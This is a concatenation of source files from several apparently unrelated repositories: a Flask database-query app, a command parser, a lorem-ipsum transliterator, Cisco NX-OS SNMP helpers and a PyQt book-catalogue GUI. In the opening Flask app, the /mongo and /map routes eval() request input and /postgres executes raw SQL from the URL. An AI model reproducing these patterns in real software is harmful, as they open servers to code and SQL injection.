MONGOPORT = 27017
client = MongoClient(MONGOSERVER, MONGOPORT)
mongodb = client[MONGODATABASE]
# Uncomment for postgres connection
# REPLACE WITH YOUR DATABASE NAME, USER AND PASS
"""
POSTGRESDATABASE = "myDatabase"
POSTGRESUSER = "user"
POSTGRESPASS = "password"
postgresdb = psycopg2.connect(
database=POSTGRESDATABASE,
user=POSTGRESUSER,
password=<PASSWORD>)
"""
QUERIES_FILENAME = '/var/www/flaskr/queries'
# Path para local
# QUERIES_FILENAME = 'queries'
@app.route("/")
def home():
try:
with open(QUERIES_FILENAME, 'r', encoding='utf-8') as queries_file:
json_file = json.load(queries_file)
pairs = [(x["name"],
x["database"],
x["description"],
x["query"],
x["params"]) for x in json_file]
return render_template('file.html', results=pairs)
    except FileNotFoundError:
with open('queries', 'r', encoding='utf-8') as queries_file:
json_file = json.load(queries_file)
pairs = [(x["name"],
x["database"],
x["description"],
x["query"],
x["params"]) for x in json_file]
return render_template('file.html', results=pairs)
@app.route("/mongo")
def mongo():
    query = ''
    try:
lista = request.args.get("query").split('---')
query = lista[0]
if len(lista) > 1:
args = lista[1:]
while query.find('param') != -1:
pos = query.find('param')
num = query[pos + 5]
if '-' in args[int(num) - 1]:
args[int(num) - 1] = '"' + args[int(num) - 1] + '"'
query = query.replace('param'+num, args[int(num) - 1])
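            # Each 'paramN' placeholder in the stored query is substituted with
            # the N-th '---'-separated argument; values containing '-' are
            # quoted so they are treated as strings (note that only
            # single-digit placeholder numbers are handled here).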
if 'messages.find({$and: [{$or: [{"sender":' in query:
results = mongodb.messages.find({"$and": [{"$or": [{"sender": args[0]}, {"sender": args[1]}]}, {"$or": [{"receptant": args[0]}, {"receptant": args[1]}]}]}, {"_id": 0, "date": 1, "sender": 1, "message":1, "receptant": 1})
else:
results = eval('mongodb.'+query)
results = json_util.dumps(results, sort_keys=True, indent=4)
if "find" in query:
return render_template('mongo.html', results=results)
else:
return "ok"
except:
return render_template('mongo.html', results={'query': query, 'problema': 'falta la base de datos de mongo'})
@app.route("/postgres")
def postgres():
try:
query = request.args.get("query")
cursor = postgresdb.cursor()
cursor.execute(query)
results = [[a for a in result] for result in cursor]
print(results)
return render_template('postgres.html', results=results)
    except:
        return render_template('postgres.html', results=[['status', 'Error'], ['Ricci hola', ' wayo hola'], ['query', query]])
@app.route("/example")
def example():
return render_template('example.html')
@app.route("/map")
def map():
    query = ''
    try:
lista = request.args.get("query").split('---')
query = lista[0]
if len(lista) > 1:
args = lista[1:]
while query.find('param') != -1:
pos = query.find('param')
num = query[pos + 5]
if '-' in args[int(num) - 1]:
args[int(num) - 1] = '"' + args[int(num) - 1] + '"'
query = query.replace('param'+num, args[int(num) - 1])
results = eval('mongodb.'+query)
results = json_util.dumps(results, sort_keys=True, indent=4)
if "find" in query:
return render_template('leaflet.html', results=results)
else:
return "ok"
except:
return render_template('mongo.html', results={'query': query, 'problema': 'falta la base de datos de mongo'})
if __name__ == "__main__":
app.run()
```
|
{
"source": "jedeland/jedel_name_generator",
"score": 3
}
|
#### File: stroke/line/__init__.py
```python
from . import abstract
__all__ = ('sub', 'trail', 'prefix', 'parse', 'analyse', 'context', 'State')
def sub(store, *names):
"""
Decorator for adding states to stores.
Returns a new store for nesting.
"""
def wrapper(invoke):
value = type(store)()
state = (invoke, value)
for name in names:
store[name] = state
return value
return wrapper
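# Usage sketch (the command name is illustrative): decorating with
# @sub(store, 'greet') registers the function under 'greet' and rebinds the
# decorated name to a fresh nested store for attaching sub-states:
#
#   store = {}
#   @sub(store, 'greet')
#   def greet(argument):
#       ...
#   # store['greet'] == (<function>, greet), where greet is now the sub-store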
def trail(store, *names):
"""
Get the value of a state from names.
Will raise KeyError with the name not belonging to store.
"""
return abstract.trail(store, names)
def prefix(values, content):
"""
    Discover the start token and separate it from the content.
Will raise ValueError if none of the starts match.
"""
for value in values:
if content.startswith(value):
break
else:
raise ValueError('invalid starts')
content = content[len(value):]
return (value, content)
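# e.g. prefix(('!', '?'), '!ping host') -> ('!', 'ping host'); content
# matching none of the starts raises ValueError.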
lower = '.'
middle = ' '
upper = ' '
def parse(content, lower = lower, middle = middle):
"""
Split content into names and argument.
"""
return abstract.parse(content, lower, middle)
def analyse(store, content, parse = parse):
"""
Parse content and find the respective invoke.
"""
(names, argument) = parse(content)
invoke = trail(store, *names) if names else None
return (names, argument, invoke)
def context(store, starts, content, prefix = prefix, analyse = analyse):
"""
Split content between start and rest, parse rest to find names and
argument, use names to find an invoke. Can raise all respective errors.
"""
(start, content) = prefix(starts, content)
(names, argument, invoke) = analyse(store, content)
return (start, names, argument, invoke)
class State(dict):
"""
Neat little way of collecting this module's functionality.
"""
__slots__ = ()
sub = sub
trail = trail
analyse = analyse
context = context
```
#### File: stroke/parse/general.py
```python
import itertools
from . import abstract
__all__ = ('strip', 'clean', 'flag', 'group', 'split')
escape = '\\'
def strip(value, escape = escape, apply = str.strip, ghost = 1):
"""
Strip value and clean escapes from ends.
"""
value = apply(value)
revert = len(escape)
for index in range(ghost):
if value.startswith(escape):
value = value[revert:]
if value.endswith(escape):
value = value[:-revert]
return value
def clean(values, strip = strip, empty = True):
"""
Strip each value and yield if not empty.
"""
for value in values:
value = strip(value)
if not value and empty:
continue
yield value
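# e.g. list(clean(['  a ', '', ' b '])) -> ['a', 'b']: each value is stripped
# and empty results are dropped.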
def flag(values, *limits, escape = escape, low = -1):
"""
    Differentiate values according to some keywords.
"""
kills = 0
revert = len(escape)
current = None
limits = {key: limit or low for (key, limit) in limits}
for (valid, key, span) in abstract.flag(escape, values, limits):
(start, stop) = (spot - kills for spot in span)
if not valid:
back = start - revert
values = values[:back] + values[start:]
kills += revert
continue
yield (current, values[:start])
current = key
values = values[stop:]
kills += stop
yield (current, values)
def group(values, *limits, flag = flag):
"""
Group key-value pairs by the key.
"""
(initial, *extras) = flag(values, *limits)
(junk, initial) = initial
try:
(keys, limits) = zip(*limits)
except ValueError:
values = ()
else:
store = {key: [] for key in keys}
for (key, value) in extras:
store[key].append(value)
(keys, values) = zip(*store.items())
return (initial, *values)
def split(values, key, limit, group = group):
"""
Separate flags by the key.
"""
limit = (key, limit)
(value, values) = group(values, limit)
values.insert(0, value)
return values
```
#### File: apps/translipsum/__init__.py
```python
from six import PY3
from transliterate.utils import translit
if PY3:
from transliterate.contrib.apps.translipsum.utils import Generator
else:
from lipsum import Generator
__title__ = 'transliterate.contrib.apps.translipsum.__init__'
__author__ = '<NAME>'
__copyright__ = '2013-2018 <NAME>'
__license__ = 'GPL 2.0/LGPL 2.1'
__all__ = ('TranslipsumGenerator',)
class TranslipsumGenerator(Generator):
"""Lorem ipsum generator."""
def __init__(self, language_code, reversed=False, *args, **kwargs):
self._language_code = language_code
self._reversed = reversed
super(TranslipsumGenerator, self).__init__(*args, **kwargs)
def generate_sentence(self, *args, **kwargs):
"""Generate sentence."""
value = super(TranslipsumGenerator, self).generate_sentence(
*args, **kwargs
)
return translit(value,
language_code=self._language_code,
reversed=self._reversed)
def generate_paragraph(self, *args, **kwargs):
"""Generate paragraph."""
value = super(TranslipsumGenerator, self).generate_paragraph(
*args, **kwargs
)
return translit(value,
language_code=self._language_code,
reversed=self._reversed)
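# Usage sketch (a transliteration pack for the chosen language code must be
# available; 'ru' is only an example):
#   g = TranslipsumGenerator(language_code='ru')
#   print(g.generate_sentence())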
```
|
{
"source": "jedelman8/pycsco",
"score": 2
}
|
#### File: pycsco/nxos/device.py
```python
try:
import xmltodict
import os.path
import yaml
import json
from os.path import expanduser
from nxapi import NXAPI
from error import CLIError
except ImportError as e:
print '***************************'
print e
print '***************************'
class Auth():
def __init__(self, vendor, model):
home = expanduser('~')
self.username = None
self.password = <PASSWORD>
creds_file = home + '/.netauth'
if os.path.isfile(creds_file):
with open(creds_file, 'r') as creds:
auth = yaml.load(creds)
try:
self.username = auth[vendor][model]['username']
self.password = auth[vendor][model]['password']
except:
pass
class Device():
def __init__(self,
username='cisco',
password='<PASSWORD>',
ip='192.168.200.50',
protocol='http',
port=None,
timeout=30):
if protocol not in ('http', 'https'):
raise ValueError('protocol must be http or https')
self.username = username
self.password = password
self.ip = ip
self.protocol = protocol
self.timeout = timeout
self.port = port
self.sw1 = NXAPI()
if self.port is not None:
self.sw1.set_target_url('%s://%s:%s/ins' % (self.protocol,
self.ip, self.port))
else:
self.sw1.set_target_url('%s://%s/ins' % (self.protocol,
self.ip))
self.sw1.set_username(self.username)
self.sw1.set_password(self.password)
self.sw1.set_timeout(self.timeout)
def open(self):
        # kept as a no-op for backward compatibility with programs that still call it
pass
def cli_error_check(self, data_dict):
        clierror = None
        msg = None
        index = 0
        has_clierror = False
error_check_list = data_dict['ins_api']['outputs']['output']
try:
for index, each in enumerate(error_check_list):
clierror = each.get('clierror', None)
msg = each.get('msg', None)
if 'clierror' in each:
has_clierror = True
except AttributeError:
clierror = error_check_list.get('clierror', None)
msg = error_check_list.get('msg', None)
has_clierror = 'clierror' in error_check_list
if clierror or has_clierror:
return CLIError(clierror, msg, index)
def show(self, command, fmat='xml', text=False):
if text is False:
self.sw1.set_msg_type('cli_show')
elif text:
self.sw1.set_msg_type('cli_show_ascii')
self.sw1.set_out_format(fmat)
self.sw1.set_cmd(command)
data = self.sw1.send_req()
if fmat == 'xml':
data_dict = xmltodict.parse(data[1])
elif fmat == 'json':
data_dict = json.loads(data[1])
clierror = self.cli_error_check(data_dict)
if clierror:
raise clierror
return data
def config(self, command, fmat='xml'):
self.sw1.set_msg_type('cli_conf')
self.sw1.set_out_format(fmat)
self.sw1.set_cmd(command)
data = self.sw1.send_req()
# return self.sw1.send_req
if fmat == 'xml':
data_dict = xmltodict.parse(data[1])
elif fmat == 'json':
data_dict = json.loads(data[1])
clierror = self.cli_error_check(data_dict)
if clierror:
raise clierror
return data
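# Usage sketch (the address and credentials are placeholders for an NX-API
# enabled Nexus switch, not real values):
#   sw = Device(username='admin', password='secret', ip='10.0.0.1')
#   raw_xml = sw.show('show version')
#   sw.config('snmp-server location lab')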
```
#### File: nxos/utils/snmp.py
```python
from pycsco.nxos.device import Device
from pycsco.nxos.utils import legacy
import json
try:
import xmltodict
except ImportError as e:
print '*' * 30
print e
print '*' * 30
__all__ = []
def get_snmp_community(device, find_filter=None):
"""Retrieves snmp community settings for a given device
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class
        find_filter (str): optional arg to return only this specific community
Returns:
dictionary
"""
command = 'show snmp community'
data = device.show(command)
data_dict = xmltodict.parse(data[1])
c_dict = {}
try:
comm_table = data_dict['ins_api']['outputs']['output']['body'].get(
'TABLE_snmp_community')['ROW_snmp_community']
for each in comm_table:
community = {}
key = str(each['community_name'])
community['group'] = str(each['grouporaccess'])
community['acl'] = str(each['aclfilter'])
c_dict[key] = community
    except TypeError:
        # comm_table is a single dict (one community) rather than a list of rows
        community = {}
        key = str(comm_table['community_name'])
        community['group'] = str(comm_table['grouporaccess'])
        community['acl'] = str(comm_table['aclfilter'])
        c_dict[key] = community
except (KeyError, AttributeError):
return c_dict
    if find_filter:
        find = c_dict.get(find_filter, None)
        if find is None:
            return {}
        return find
    return c_dict
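# Example (the community name is hypothetical):
#   all_communities = get_snmp_community(device)
#   public = get_snmp_community(device, find_filter='public')  # {} if absent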
def remove_snmp_community(community):
return ['no snmp-server community ' + community]
def config_snmp_community(delta, community):
CMDS = {
'group': 'snmp-server community {0} group {group}',
'acl': 'snmp-server community {0} use-acl {acl}'
}
commands = []
for k, v in delta.iteritems():
cmd = CMDS.get(k).format(community, **delta)
if cmd:
commands.append(cmd)
cmd = None
return commands
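# e.g. config_snmp_community({'group': 'network-operator'}, 'public') returns
# ['snmp-server community public group network-operator'].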
def get_snmp_groups(device):
"""Retrieves snmp groups for a given device
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class
Returns:
list of groups
"""
command = 'show snmp group'
data = device.show(command)
data_dict = xmltodict.parse(data[1])
g_list = []
try:
group_table = data_dict['ins_api']['outputs']['output']['body'].get(
'TABLE_role')['ROW_role']
for each in group_table:
g_list.append(each['role_name'])
except (KeyError, AttributeError):
return g_list
return g_list
def remove_snmp_user(user):
return ['no snmp-server user ' + user]
def config_snmp_user(proposed, user, reset, new):
# check to see if it was a new config
# and see if it is going from a non-encrypted
# password to an encrypted one
if reset and not new:
commands = remove_snmp_user(user)
else:
commands = []
group = proposed.get('group', None)
cmd = ''
if group:
cmd = 'snmp-server user {0} {group}'.format(user, **proposed)
auth = proposed.get('authentication', None)
pwd = proposed.get('pwd', None)
if auth and pwd:
cmd += ' auth {authentication} {pwd}'.format(**proposed)
encrypt = proposed.get('encrypt', None)
privacy = proposed.get('privacy', None)
if encrypt and privacy:
cmd += ' priv {encrypt} {privacy}'.format(**proposed)
elif privacy:
cmd += ' priv {privacy}'.format(**proposed)
if cmd:
commands.append(cmd)
return commands
def get_snmp_user(device, user):
"""Retrieves snmp user configuration for a given user on a given device
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class
user (str): name of user (max size 28 chars)
Returns:
dictionary
"""
command = 'show snmp user ' + user
data = device.show(command)
data_dict = xmltodict.parse(data[1])
resource = {}
try:
resource_table = data_dict['ins_api']['outputs']['output']['body'].get(
'TABLE_snmp_users')['ROW_snmp_users']
resource['user'] = str(resource_table['user'])
resource['authentication'] = str(resource_table['auth']).strip()
encrypt = str(resource_table['priv']).strip()
if encrypt.startswith('aes'):
resource['encrypt'] = 'aes-128'
else:
resource['encrypt'] = 'none'
group_table = resource_table['TABLE_groups']['ROW_groups']
groups = []
try:
for group in group_table:
groups.append(str(group['group']))
except TypeError:
groups.append(str(group_table['group']))
resource['group'] = groups
except (KeyError, AttributeError):
return resource
return resource
def get_snmp_contact(device):
"""Retrieves snmp contact from a device
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class
Returns:
dictionary
"""
command = 'show run snmp'
data = device.show(command, text=True)
data_dict = xmltodict.parse(data[1])
raw_text = data_dict['ins_api']['outputs']['output']['body']
existing = legacy.get_structured_data('snmp_contact.tmpl', raw_text)
if len(existing) == 1:
return existing[0]
return existing
def get_snmp_location(device):
"""Retrieves snmp location from a device
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class
Returns:
dictionary
"""
command = 'show run snmp'
data = device.show(command, text=True)
data_dict = xmltodict.parse(data[1])
raw_text = data_dict['ins_api']['outputs']['output']['body']
existing = legacy.get_structured_data('snmp_location.tmpl', raw_text)
if len(existing) == 1:
return existing[0]
return existing
def get_snmp_host(device, host):
"""Retrieves snmp host configuration for a given host on a given device
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class
host (str): IP Address or hostname of snmp host
Returns:
dictionary
"""
command = 'show snmp host'
data = device.show(command)
data_dict = xmltodict.parse(data[1])
resource = {}
try:
resource_table = data_dict['ins_api']['outputs']['output']['body'].get(
'TABLE_host')['ROW_host']
for each in resource_table:
temp = {}
key = str(each['host'])
temp['udp'] = str(each['port']).strip()
temp['version'] = str(each['version']).strip()
temp['v3'] = str(each['level']).strip()
temp['type'] = str(each['type']).strip()
temp['community'] = str(each['secname']).strip()
src = each.get('src_intf', None)
if src:
temp['src_intf'] = src.split(':')[1].strip()
vrf_filt = each.get('TABLE_vrf_filters', None)
if vrf_filt:
temp['vrf_filter'] = vrf_filt['ROW_vrf_filters']['vrf_filter'].split(':')[1].split(',')
vrf = each.get('vrf', None)
if vrf:
temp['vrf'] = vrf.split(':')[1].strip()
resource[key] = temp
except (TypeError):
temp = {}
key = str(resource_table['host'])
temp['udp'] = str(resource_table['port']).strip()
temp['version'] = str(resource_table['version']).strip()
temp['v3'] = str(resource_table['level']).strip()
temp['type'] = str(resource_table['type']).strip()
temp['community'] = str(resource_table['secname']).strip()
src = resource_table.get('src_intf', None)
if src:
temp['src_intf'] = src.split(':')[1].strip()
vrf_filt = resource_table.get('TABLE_vrf_filters', None)
if vrf_filt:
temp['vrf_filter'] = vrf_filt['ROW_vrf_filters']['vrf_filter'].split(':')[1].split(',')
vrf = resource_table.get('vrf', None)
if vrf:
temp['vrf'] = vrf.split(':')[1].strip()
resource[key] = temp
except (KeyError, AttributeError):
return resource
find = resource.get(host, None)
if find:
return find
else:
return {}
def remove_snmp_host(host, existing):
    commands = []
    command = ''
if existing['version'] == 'v3':
existing['version'] = '3'
command = 'no snmp-server host {0} {type} version {version} {v3} {community}'.format(host, **existing)
elif existing['version'] == 'v2c':
existing['version'] = '2c'
command = 'no snmp-server host {0} {type} version {version} {community}'.format(host, **existing)
if command:
commands.append(command)
return commands
def config_snmp_host(delta, proposed, existing):
commands = []
host = proposed['snmp_host']
cmd = 'snmp-server host ' + proposed['snmp_host']
type1 = delta.get('type', None)
version = delta.get('version', None)
ver = delta.get('v3', None)
community = delta.get('community', None)
if any([type1, version, ver, community]):
cmd += ' ' + (type1 or existing.get('type'))
version = version or existing.get('version')
if version == 'v2c':
vn = '2c'
elif version == 'v3':
vn = '3'
cmd += ' version ' + vn
if ver:
cmd += ' '
cmd += (ver or existing.get('v3'))
cmd += ' '
cmd += (community or existing.get('community'))
commands.append(cmd)
CMDS = {
'vrf_filter': 'snmp-server host {0} filter-vrf {vrf_filter}',
'vrf': 'snmp-server host {0} use-vrf {vrf}',
'udp': 'snmp-server host {0} udp-port {udp}',
'src_intf': 'snmp-server host {0} source-interface {src_intf}'
}
for key, value in delta.iteritems():
if key in ['vrf_filter', 'vrf', 'udp', 'src_intf']:
command = CMDS.get(key, None)
if command:
cmd = command.format(host, **delta)
commands.append(cmd)
cmd = None
return commands
def get_snmp_traps(device, group):
"""Retrieves snmp traps configuration for a given device
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class
group (str): group of snmp traps as defined in the switch
Returns:
list
"""
command = 'show snmp trap'
data = device.show(command)
data_dict = xmltodict.parse(data[1])
resource = {}
try:
resource_table = data_dict['ins_api']['outputs']['output']['body'].get(
'TABLE_snmp_trap')['ROW_snmp_trap']
for each in ['aaa', 'bridge', 'callhome', 'cfs', 'config', 'entity',
'feature-control', 'hsrp', 'license', 'link', 'lldp',
'ospf', 'rf', 'rmon', 'snmp', 'storm-control', 'stpx',
'sysmgr', 'system', 'upgrade', 'vtp']:
resource[each] = []
for each in resource_table:
temp = {}
key = str(each['trap_type'])
temp['trap'] = str(each['description'])
temp['enabled'] = str(each['isEnabled'])
if key != 'Generic':
resource[key].append(temp)
except (KeyError, AttributeError):
return resource
find = resource.get(group, None)
    if group.lower() == 'all':
return resource
elif find:
return find
else:
return []
```
|
{
"source": "JedersonLuz/BibWorld",
"score": 2
}
|
#### File: JedersonLuz/BibWorld/stackedMainWindow.py
```python
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMessageBox
import PyrebaseConnector as PC
import BibWorld
import sys
class Ui_Main(QtWidgets.QWidget):
def setupUi(self, Main):
Main.setObjectName("Main")
Main.resize(800, 480)
self.flagEdit = 4
self.QtStack = QtWidgets.QStackedLayout()
self.stack0 = QtWidgets.QMainWindow()
self.stack1 = QtWidgets.QMainWindow()
self.stack2 = QtWidgets.QMainWindow()
self.stack3 = QtWidgets.QMainWindow()
self.stack4 = QtWidgets.QMainWindow()
self.stack5 = QtWidgets.QMainWindow()
self.stack6 = QtWidgets.QMainWindow()
self.stack7 = QtWidgets.QMainWindow()
self.stack8 = QtWidgets.QMainWindow()
self.stack9 = QtWidgets.QMainWindow()
self.login_ui = BibWorld.loginWindows.Ui_Form()
self.login_ui.setupUi(self.stack0)
self.add_user_ui = BibWorld.telaAddUser.Ui_Form()
self.add_user_ui.setupUi(self.stack8)
self.main_ui = BibWorld.Ui_MainWindow()
self.main_ui.setupUi(self.stack1)
self.add_ui = BibWorld.telaAdd.Add_Form()
self.add_ui.setupUi(self.stack2)
self.remove_ui = BibWorld.Remover.Ui_RemoveWindow()
self.remove_ui.setupUi(self.stack3)
self.edit_ui = BibWorld.telaEditar.Ui_EditWindow()
self.edit_ui.setupUi(self.stack4)
self.edit_form_ui = BibWorld.telaEditForm.Edit_Form()
self.edit_form_ui.setupUi(self.stack5)
self.search_ui = BibWorld.telaBuscar.Ui_BuscarWindow()
self.search_ui.setupUi(self.stack6)
self.read_ui = BibWorld.telaVerLivro.Ui_MainWindow()
self.read_ui.setupUi(self.stack7)
self.editUser_ui = BibWorld.telaEditUser.Ui_Form()
self.editUser_ui.setupUi(self.stack9)
self.QtStack.addWidget(self.stack0)
self.QtStack.addWidget(self.stack1)
self.QtStack.addWidget(self.stack2)
self.QtStack.addWidget(self.stack3)
self.QtStack.addWidget(self.stack4)
self.QtStack.addWidget(self.stack5)
self.QtStack.addWidget(self.stack6)
self.QtStack.addWidget(self.stack7)
self.QtStack.addWidget(self.stack8)
self.QtStack.addWidget(self.stack9)
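        # Stack indices used by the navigation methods below: 0=login, 1=main,
        # 2=add book, 3=remove, 4=edit list, 5=edit form, 6=search,
        # 7=view book, 8=sign-up, 9=edit user.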
class Main(QMainWindow, Ui_Main):
def __init__(self, parent=None):
super(Main, self).__init__(parent)
self.setupUi(self)
self.login_ui.pushButton.clicked.connect(self.MakeLogin)
self.login_ui.pushButton_2.clicked.connect(self.OpenSignUpWindow)
self.add_user_ui.buttonSubmit.clicked.connect(self.MakeSignUp)
self.add_user_ui.buttonBack.clicked.connect(self.OpenLoginWindow)
self.main_ui.buttonAddBook.clicked.connect(self.OpenAddWindow)
self.add_ui.button_voltar.clicked.connect(self.OpenMainWindow)
self.main_ui.buttonRemoveBook.clicked.connect(self.OpenRemoveWindow)
self.remove_ui.botao_voltar.clicked.connect(self.OpenMainWindow)
self.main_ui.buttonEditBook.clicked.connect(self.OpenEditWindow)
self.edit_ui.botao_voltar.clicked.connect(self.OpenMainWindow)
self.edit_ui.botao_editar.clicked.connect(self.OpenEditFormWindows)
self.edit_form_ui.button_cadastrar.clicked.connect(self.editBook)
self.edit_form_ui.button_voltar.clicked.connect(self.BackEdit)
self.main_ui.buttonSearch.clicked.connect(self.OpenBuscarWindow)
self.search_ui.botao_voltar.clicked.connect(self.OpenMainWindow)
self.search_ui.botao_buscar.clicked.connect(self.OpenReadWindow)
self.read_ui.button_back.clicked.connect(self.OpenBuscarWindow)
self.read_ui.pushButton.clicked.connect(self.OpenEditFormWindows_telaVerLivro)
self.main_ui.buttonEditUser.clicked.connect(self.OpenEditUser)
self.main_ui.buttonExit.clicked.connect(self.messageBoxExit)
self.editUser_ui.button_back.clicked.connect(self.OpenMainWindow)
def MakeLogin(self):
erroVazio = 0
if (self.login_ui.lineEdit.text() == '') or (self.login_ui.lineEdit_2.text() == ''):
self.edit_ui.messageBox('Campos obrigatórios!', 'Erro')
erroVazio = 1
if erroVazio == 0:
email = self.login_ui.lineEdit.text()
password = self.login_ui.lineEdit_2.text()
response = PC.pc.login(email, password)
if response == 'Ok':
self.OpenMainWindow()
else:
self.edit_ui.messageBox(response, 'Erro')
def messageBoxExit(self):
infoBox = QMessageBox()
infoBox.setIcon(QMessageBox.Information)
infoBox.setText('Tem certeza que deseja sair?')
infoBox.setWindowTitle('Alerta')
infoBox.setStandardButtons(QMessageBox.Yes | QMessageBox.No)
infoBox.buttonClicked.connect(self.BackLogin)
infoBox.exec_()
def BackLogin(self, choosedButton):
if choosedButton.text() == '&Yes':
self.login_ui.lineEdit.setText('')
self.login_ui.lineEdit_2.setText('')
self.OpenLoginWindow()
def MakeSignUp(self):
email = self.add_user_ui.lineEditEmail.text()
password = self.add_user_ui.lineEditPassword.text()
password_2 = self.add_user_ui.lineEditPassword_2.text()
displayName = self.add_user_ui.lineEditUserName.text()
dateBirth = self.add_user_ui.dateBirth.text()
gender = self.add_user_ui.selectGender.currentText()
erroVazio = 0
if (email == '') or (password == '') or (password_2 == '') or (displayName == ''):
self.edit_ui.messageBox('Campos obrigatórios.', 'Erro')
erroVazio = 1
erroSenha = 0
if (password != password_2) and (erroVazio == 0):
self.edit_ui.messageBox('Os campos de senha não coincidem.', 'Erro')
erroSenha = 1
if (erroVazio == 0) and (erroSenha == 0):
response = PC.pc.signUp(email, password, displayName, dateBirth, gender)
if response == 'Ok':
self.edit_ui.messageBox('Cadastro realizado com sucesso. Bem-vindo (a) ao BibWorld!', 'Confirmação')
self.OpenLoginWindow()
else:
self.edit_ui.messageBox(response, 'Erro')
def OpenSignUpWindow(self):
self.QtStack.setCurrentIndex(8)
def OpenLoginWindow(self):
self.QtStack.setCurrentIndex(0)
def OpenMainWindow(self):
keyUser = PC.pc.auth.current_user['localId']
currentUser = PC.pc.db.child('users').child(keyUser).get()
self.main_ui.labelUser1.setText(currentUser.val()['displayName'])
self.QtStack.setCurrentIndex(1)
def OpenAddWindow(self):
self.QtStack.setCurrentIndex(2)
def OpenRemoveWindow(self):
self.remove_ui.updateTable()
self.QtStack.setCurrentIndex(3)
def OpenEditWindow(self):
self.edit_ui.updateTable()
self.QtStack.setCurrentIndex(4)
def OpenEditFormWindows(self):
self.flagEdit = 4
if self.edit_ui.lineEdit.text() == '':
self.edit_ui.messageBox("Campo obrigatório!", "Aviso")
else:
try:
int(self.edit_ui.lineEdit.text())
book = PC.pc.searchBook_ISBN(self.edit_ui.lineEdit.text())
if book:
self.edit_form_ui.lineTitulo.setText(book['title'])
self.edit_form_ui.lineISBN.setText(str(book['ISBN']))
self.edit_form_ui.lineAutor.setText(book['leadAutor'])
self.edit_form_ui.lineNumPag.setText(str(book['numPages']))
self.edit_form_ui.dateEdit.setDate(QtCore.QDate(int(book['pubDate'].split('/')[2]), int(book['pubDate'].split('/')[1]), int(book['pubDate'].split('/')[0])))
self.QtStack.setCurrentIndex(5)
self.edit_ui.lineEdit.setText('')
else:
self.edit_ui.messageBox("ISBN não encontrado!", "Erro")
except:
self.edit_ui.messageBox("O ISBN é um campo de números! Tente novamente!", "Erro")
def OpenEditFormWindows_telaVerLivro(self):
self.flagEdit = 7
self.edit_form_ui.lineTitulo.setText(self.read_ui.book['title'])
self.edit_form_ui.lineISBN.setText(str(self.read_ui.book['ISBN']))
self.edit_form_ui.lineAutor.setText(self.read_ui.book['leadAutor'])
self.edit_form_ui.lineNumPag.setText(str(self.read_ui.book['numPages']))
self.edit_form_ui.dateEdit.setDate(QtCore.QDate(int(self.read_ui.book['pubDate'].split('/')[2]), int(self.read_ui.book['pubDate'].split('/')[1]), int(self.read_ui.book['pubDate'].split('/')[0])))
self.QtStack.setCurrentIndex(5)
def OpenBuscarWindow(self):
self.search_ui.updateTable()
self.QtStack.setCurrentIndex(6)
def OpenReadWindow(self):
self.flagEdit = 7
erroVazio = 0
if(self.search_ui.lineEdit.text() == ''):
self.edit_ui.messageBox('Campo obrigatório!', 'Erro')
erroVazio = 1
if(erroVazio == 0):
self.read_ui.book = PC.pc.searchBook_ISBN(self.search_ui.lineEdit.text())
if(self.read_ui.book != None):
self.read_ui.UpdateTable()
self.QtStack.setCurrentIndex(7)
else:
self.edit_ui.messageBox('ISBN não existe!', 'Erro')
def OpenEditUser(self):
keyUser = PC.pc.auth.current_user['localId']
email = PC.pc.auth.current_user['email']
currentUser = PC.pc.db.child('users').child(keyUser).get()
self.editUser_ui.lineEdit_4.setText(email)
self.editUser_ui.lineEdit_5.setText(currentUser.val()['displayName'])
self.editUser_ui.dateEdit.setDate(QtCore.QDate(int(currentUser.val()['dateBirth'].split('/')[2]), int(currentUser.val()['dateBirth'].split('/')[1]), int(currentUser.val()['dateBirth'].split('/')[0])))
if currentUser.val()['gender'] == 'Feminino': gender = 0
else: gender = 1
self.editUser_ui.comboBox.setCurrentIndex(gender)
self.QtStack.setCurrentIndex(9)
def editBook(self):
erroNum = 0
erroISBN = 0
erroVazio = 0
if((self.edit_form_ui.lineISBN.text() == '') or (self.edit_form_ui.lineTitulo.text() == '') or (self.edit_form_ui.lineAutor.text() == '') or (self.edit_form_ui.lineNumPag.text() == '') or (self.edit_form_ui.fname == '')):
self.edit_form_ui.messageBox("Todas os campos devem ser preenchidos!", "Campos obrigatórios")
erroVazio = 1
if((erroISBN == 0) and (erroVazio == 0)):
try:
int(self.edit_form_ui.lineISBN.text())
except:
self.edit_form_ui.messageBox("O ISBN é um campo de números! Tente novamente!", "Erro")
erroISBN = 1
if(erroNum == 0 and (erroISBN == 0) and (erroVazio == 0)):
try:
int(self.edit_form_ui.lineNumPag.text())
except:
self.edit_form_ui.messageBox("Número de páginas inválido! Tente novamente!", "Erro")
erroNum = 1
if((erroISBN == 0) and (erroNum == 0) and (erroVazio == 0)):
PC.pc.updateBook(self.edit_form_ui.lineISBN.text(), self.edit_form_ui.lineTitulo.text(), self.edit_form_ui.lineAutor.text(), self.edit_form_ui.lineNumPag.text(), self.edit_form_ui.dateEdit.text(), self.edit_form_ui.fname)
self.edit_form_ui.messageBox("Alterações salvas com sucesso!", "Confirmação de alteração")
self.edit_form_ui.lineISBN.setText('')
self.edit_form_ui.lineTitulo.setText('')
self.edit_form_ui.lineAutor.setText('')
self.edit_form_ui.lineNumPag.setText('')
self.QtStack.setCurrentIndex(self.flagEdit)
def BackEdit(self):
self.QtStack.setCurrentIndex(self.flagEdit)
if __name__ == '__main__':
app = QApplication(sys.argv)
showMain = Main()
sys.exit(app.exec_())
```
#### File: BibWorld/telas/telaAddUser.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(577, 502)
Form.setFixedSize(577, 502)
self.label = QtWidgets.QLabel(Form)
self.label.setGeometry(QtCore.QRect(80, 10, 401, 61))
self.label.setObjectName("label")
self.layoutWidget = QtWidgets.QWidget(Form)
self.layoutWidget.setGeometry(QtCore.QRect(170, 108, 231, 321))
self.layoutWidget.setObjectName("layoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.layoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
